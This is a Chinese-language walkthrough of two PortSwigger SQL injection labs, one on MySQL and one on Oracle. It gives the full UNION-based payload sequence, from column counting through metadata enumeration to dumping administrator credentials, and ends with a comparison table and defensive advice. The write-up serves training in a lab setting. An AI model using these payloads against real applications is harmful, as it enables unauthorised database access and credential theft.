PortSwigger SQL注入LAB5  LAB6
断列数最后把数据库中的结构信息回显到页面里。但它们的数据库环境并不一样一题侧重 MySQL另一题侧重 Oracle。正因为如此注释符、系统视图这些细节会有差别所以我把这两个 LAB 放在一起来分享也顺便做个对比。LAB5描述LAB6描述【本篇目标】先用 MySQL 题目演示一下我是怎么从列数探测一路做到字段枚举最后拿到 administrator 的密码并登录的。再补一段 Oracle 分支看看同样的题目在 Oracle 中换一种思路是怎样的。一、先记住这类题的通用思路这类 UNION 注入题的主线其实不复杂我一般会把它概括成四步确认注入点通常是一个看起来普通的分类参数。通过 ORDER BY n 判断原查询有几列。用 NULL 对齐列数再尝试把敏感数据带到可回显的列里。根据数据库类型调整注释符和系统函数。如果把这四步牢牢记住后面再看到相似题型时基本就是在切换数据库语法而不是重新发明一套打法。二、MySQL 分支通过列名拿到密码LAB主页LAB登录界面先看 MySQL 这道题。页面上的注入点仍然是 /filter?category…我先把后端查询大致推测出来SELECT * FROM products WHERE category ‘Gifts’2.1 探测列数为了让 UNION 语句成立我得先知道原查询有几列。这里我用 ORDER BY n 逐步测试’ ORDER BY 1–’ ORDER BY 2–’ ORDER BY 3–Burp Suite 抓取结果2当 ORDER BY 3 报错时就说明原查询只有 2 列。这一步是后面所有 UNION 注入的前提。【注释符提醒】MySQL 中 – 后面要保留空格如果在 URL 里直接用记得把空格写成 或 %20。本篇后续示例统一用 – 书写方便阅读。2.2 从信息架构里找字段这道题的核心不是直接猜表名而是先枚举数据库元数据。information_schema.columns 里面保存了列名信息所以我先拿它来找用户名和密码字段Burp Suite 抓取结果3SELECT * FROM products WHERE category ‘’ UNION SELECT NULL, column_name FROM information_schema.columns –筛选结果里会出现两个很显眼的字段username_vadgwn 和 password_txeztd。2.3 反查表名拿到列名之后我再反查它们来自哪个表SELECT * FROM products WHERE category ‘’ UNION SELECT NULL, table_name FROM information_schema.columns WHERE column_name ‘username_vadgwn’ –SELECT * FROM products WHERE category ‘’ UNION SELECT NULL, table_name FROM information_schema.columns WHERE column_name ‘password_txeztd’ –Burp Suite 抓取结果4Burp Suite 抓取结果5两次查询都指向同一个表 users_teluls说明凭据都存放在这里。2.4 回显用户名和密码既然已经确认表名我就可以把用户名和密码直接拼到 UNION 结果里SELECT * FROM products WHERE category ‘’ UNION SELECT username_vadgwn, password_txeztd FROM users_teluls –最终请求可以写成GET /filter?category’ UNION SELECT username_vadgwn,password_txeztd FROM users_teluls -- HTTP/2Burp Suite 抓取结果6把回显结果中的 administrator 密码填回登录页就能直接通过认证。攻击成功【MySQL 分支 Payload】’ UNION SELECT username_vadgwn,password_txeztd FROM users_teluls –三、Oracle 分支通过表名拿到密码Oracle 题和上面的 MySQL 题思路几乎相同不过我想换一种方法也就是先查表名再通过列名来验证是否为正确目标。3.1 查询表名在 MySQL 中我们是通过“人肉扫描”的办法来寻找可疑项的这一次我打算改成用 LIKE 搭配通配符来做模糊搜索。还有一点要注意的是大小写问题。为了防止大小写不一致导致查询结果缺失这里我用了一个 upper 函数把 table_name 转成大写这样搜索时就不会区分大小写了。SELECT * FROM products WHERE category ‘’ UNION SELECT NULL, table_name FROM all_tables WHERE upper(table_name) LIKE ‘%USER%’ –Burp Suite 抓取结果7通过模糊搜索表名我找到了可疑表名 USERS_NRCXBC。3.2 检索列名接下来我再看一下表中的列是不是我要找的用户名和密码。SELECT * FROM products WHERE category ‘’ UNION SELECT NULL, column_name FROM all_tab_columns WHERE table_name ‘USERS_NRCXBC’ –Burp Suite 抓取结果8可以看到表中的列名分别为 EMAIL、PASSWORD_EBXMBT、USERNAME_MUXIWC说明凭据确实存放在这张表里。3.3 回显用户名和密码确定了表名和列名之后我就可以把用户名和密码直接拼到 UNION 结果里了SELECT * FROM products WHERE category ‘’ UNION SELECT USERNAME_MUXIWC, PASSWORD_EBXMBT FROM USERS_NRCXBC –最终请求可以写成GET /filter?category’ UNION SELECT USERNAME_MUXIWC,PASSWORD_EBXMBT FROM USERS_NRCXBC -- HTTP/2Burp Suite 抓取结果9把回显结果中的 administrator 密码填回登录页就能直接通过认证。攻击成功2【Oracle 分支 Payload】’ UNION SELECT USERNAME_MUXIWC,PASSWORD_EBXMBT FROM USERS_NRCXBC –四、两者的区别如果把这两道题放在一起看最容易混淆的地方其实不是 UNION 的写法而是数据库环境的切换。前面的操作步骤看起来差不多但真正落地时我还是得跟着数据库类型去调整注释符、系统视图和回显思路。对比项 MySQL 分支 Oracle 分支注释符 常用 – 注意后面要带空格 同样可以用 – 但更要留意 URL 编码元数据视图 主要看 information_schema.columns 主要看 all_tables 和 all_tab_columns查询思路 先找列名再反查表名最后回显用户名和密码 先模糊匹配表名再确认列名最后把目标字段直接拼进 UNION所以本质上它们还是同一道类型题先确认注入点再判断列数再按数据库语法去找元数据。只要把这个顺序稳住后面换成别的数据库也只是细节在变思路不会变。五、总结与防御建议这两道实验都属于 UNION 联合查询注入它们共同暴露出的问题也很一致用户输入直接拼接进 SQL错误信息被回显数据库元数据也没有被限制。根本成因我整理成三点产品类别过滤器参数被直接拼接到 SQL 语句中未做安全处理应用将数据库错误直接回显给客户端为列数探测和结构枚举提供反馈数据库账户和敏感表结构缺乏最小权限隔离导致凭据或版本信息可被直接读取。防御措施我也简单列一下参数化查询 —— 将 SQL 代码与用户数据彻底分离关闭详细错误回显 —— 生产环境屏蔽数据库报错细节避免泄露结构信息限制系统元数据访问 —— 对 information_schema 等元数据视图进行访问控制最小权限原则 —— 数据库账户仅授予必要权限统一审计和告警 —— 对高频的 ORDER BY、UNION、系统视图访问行为做监控。

相关新闻

Unity 2021.3与Pico SDK 230实现VR手势交互开发全流程

Unity 2021.3与Pico SDK 230实现VR手势交互开发全流程

1. 项目概述:为什么选择手势交互?最近在做一个面向Pico Neo 3/4的VR项目,客户明确要求“去手柄化”,希望用户能像电影里那样,直接用手势来操作界面、抓取物体。这其实反映了当前VR内容发展的一个趋势:从依赖…

2026/7/22 9:38:23 阅读更多 →
VMware安装CentOS7完整指南与优化配置

VMware安装CentOS7完整指南与优化配置

1. 项目概述在虚拟化技术普及的今天,使用VMware Workstation(简称VM)安装CentOS7仍然是许多开发者和运维人员的首选方案。作为一名长期使用Linux系统的老鸟,我完整记录了从镜像下载到系统配置的全过程,特别针对国内网络…

2026/7/22 9:38:23 阅读更多 →
信创环境下内网考试系统部署与安全实践

信创环境下内网考试系统部署与安全实践

1. 信创背景下的内网考试系统需求分析在数字化转型和国产化替代的大背景下,部队及涉密单位对内部考试培训系统的需求呈现出明显的特殊性。传统基于互联网的SaaS考试平台已无法满足这类单位对数据安全、系统可控性和国产化适配的严格要求。核心需求痛点主要体现在三个…

2026/7/22 9:38:23 阅读更多 →

最新新闻

Transformer编码器架构与优化实践详解

Transformer编码器架构与优化实践详解

1. 编码器核心架构解析编码器作为序列数据处理的核心组件,其架构设计直接影响模型对输入信息的理解能力。现代编码器通常采用多层Transformer结构,每层包含自注意力机制和前馈神经网络两个核心子层。以典型BERT模型为例,其编码器部分由12-24个…

2026/7/23 15:00:09 阅读更多 →
2026最新:哪几款抖音解析工具好用?这4款免费实用神器亲测好用

2026最新:哪几款抖音解析工具好用?这4款免费实用神器亲测好用

按人群先给建议 针对2026年大家问的好用免费抖音解析工具,我结合长期测试AI效率工具的经验,按不同使用场景整理了4款亲测实用的工具,没有绝对的万能款,只分场景适配:需要免费提取抖音文案、需要做结构化内容总结、需要…

2026/7/23 15:00:09 阅读更多 →
期刊投稿必看✅科研绘图规范与避坑,告别配图返修

期刊投稿必看✅科研绘图规范与避坑,告别配图返修

论文内容审核通过,却次次卡在图片格式被返修?😤不懂期刊绘图规范,辛苦画的图直接被打回重改?分享一套零基础通用科研绘图规范技巧,适配毕业论文期刊投稿📸很多科研人和毕业生都有一个通病&#…

2026/7/23 15:00:09 阅读更多 →
科研绘图不会画?[特殊字符]论文图表、技术路线图一键搞定

科研绘图不会画?[特殊字符]论文图表、技术路线图一键搞定

论文内容写得再好,配图粗糙也直接拉低分数?不会PS、不会绘图软件,技术路线图、实验图总被导师打回?分享一个超适合学生党的科研绘图方法,零基础也能画出期刊级配图✅写论文、做科研的同学应该都有同感:内容…

2026/7/23 15:00:09 阅读更多 →
CDN共建机房模式解析与应用实践

CDN共建机房模式解析与应用实践

1. CDN共建机房模式解析:从概念到落地 CDN(内容分发网络)共建机房是近年来兴起的一种基础设施共享模式,简单来说就是由CDN服务商牵头,联合多家企业共同投资建设边缘节点机房。这种模式最早出现在2018年左右&#xff0c…

2026/7/23 15:00:09 阅读更多 →
AI操作系统:从意图理解到能力调度的技术演进

AI操作系统:从意图理解到能力调度的技术演进

1. 从"应用商店"到"意图市场"的范式迁移 当Claude这类AI系统开始直接调用系统底层能力时,传统APP的生存空间正在被压缩。我最近测试了最新版的Claude企业版,发现它已经能绕过应用程序界面,直接操作系统文件、调用摄像头、…

2026/7/23 14:59:09 阅读更多 →

日新闻

从单点好评到指数级传播:AI副业主理人必须掌握的4层口碑渗透模型(含ROI测算表)

从单点好评到指数级传播:AI副业主理人必须掌握的4层口碑渗透模型(含ROI测算表)

更多请点击: https://intelliparadigm.com 第一章:从单点好评到指数级传播:AI副业主理人必须掌握的4层口碑渗透模型(含ROI测算表) 当AI副业主理人不再仅满足于单次服务交付,而是主动构建可复用、可裂变、可…

2026/7/23 0:00:25 阅读更多 →
AI写作开头钩子设计:为什么你的AI文案完读率不足18%?——基于2,346篇A/B测试报告的归因分析

AI写作开头钩子设计:为什么你的AI文案完读率不足18%?——基于2,346篇A/B测试报告的归因分析

更多请点击: https://codechina.net 第一章:AI写作开头钩子设计:为什么你的AI文案完读率不足18%?——基于2,346篇A/B测试报告的归因分析 在对2,346篇跨行业AI生成文案的A/B测试数据进行聚类分析后,我们发现&#xff1…

2026/7/23 0:01:26 阅读更多 →
Chitchatter完整指南:免费开源的终极点对点安全聊天工具

Chitchatter完整指南:免费开源的终极点对点安全聊天工具

Chitchatter完整指南:免费开源的终极点对点安全聊天工具 【免费下载链接】chitchatter Secure peer-to-peer chat that is serverless, decentralized, and ephemeral 项目地址: https://gitcode.com/gh_mirrors/ch/chitchatter Chitchatter是一款革命性的安…

2026/7/23 0:01:26 阅读更多 →

周新闻

Go语言静态资源打包方案对比与实践指南

Go语言静态资源打包方案对比与实践指南

1. 项目背景与核心需求在Go语言开发中,我们经常需要处理静态资源文件的打包问题。无论是Web应用的模板文件、前端资源,还是配置文件、证书等,都需要随程序一起分发。传统做法是将这些文件与编译后的二进制文件放在同一目录下,但这…

2026/7/22 8:58:19 阅读更多 →
Go语言实现高性能LDAP认证服务的架构与实践

Go语言实现高性能LDAP认证服务的架构与实践

1. 项目背景与核心价值LDAP(轻量级目录访问协议)作为企业级身份认证的黄金标准,已经服务了超过80%的财富500强公司。我在金融科技领域实施统一认证体系时,发现传统Java方案存在启动慢、内存占用高等痛点。而Go语言凭借其协程并发模…

2026/7/22 19:43:43 阅读更多 →
【AI面试官实战指南】:用ChatGPT模拟10类高频技术岗面试,3天提升应答精准度92%

【AI面试官实战指南】:用ChatGPT模拟10类高频技术岗面试,3天提升应答精准度92%

更多请点击: https://intelliparadigm.com 第一章:AI面试官实战指南的核心价值与适用场景 AI面试官并非替代人类HR的“黑箱工具”,而是以可解释、可审计、可迭代的方式,赋能招聘全链路的关键基础设施。其核心价值在于将主观经验沉…

2026/7/22 12:54:44 阅读更多 →

月新闻